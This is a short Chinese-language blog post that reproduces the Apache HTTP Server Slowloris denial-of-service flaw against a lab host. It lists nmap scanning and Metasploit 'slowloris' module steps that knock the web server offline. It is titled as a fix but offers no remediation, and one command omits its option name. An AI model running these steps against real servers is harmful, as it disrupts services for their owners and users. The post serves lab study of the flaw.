这篇文章给大家介绍如何解决Apache HTTP服务器守护进程中断复现问题,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。
一、漏洞介绍
Apache HTTP服务器1.x和2.x允许远程攻击者通过部分HTTP请求导致拒绝服务(守护进程中断),这与2.2.15之前版本中缺少mod_ReqTimeout模块有关。
二、漏洞利用
1、访问我们的靶机:192.168.1.131,正常访问
2、启动msf,通过nmap扫描该服务器,判断该漏洞是否存在,nmap -sS -Pn -A 192.168.1.131
3、搜索可利用模块,并选择
search slowloris
4、查看需要配置的参数,只需配置目标ip即可show options
5、设置目标ip set 192.168.1.131
6、运行,run
7、再次访问靶机192.168.1.131,已无法访问
8、ctrl+c结束攻击,网页瞬间就又可以访问了
关于如何解决Apache HTTP服务器守护进程中断复现问题就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。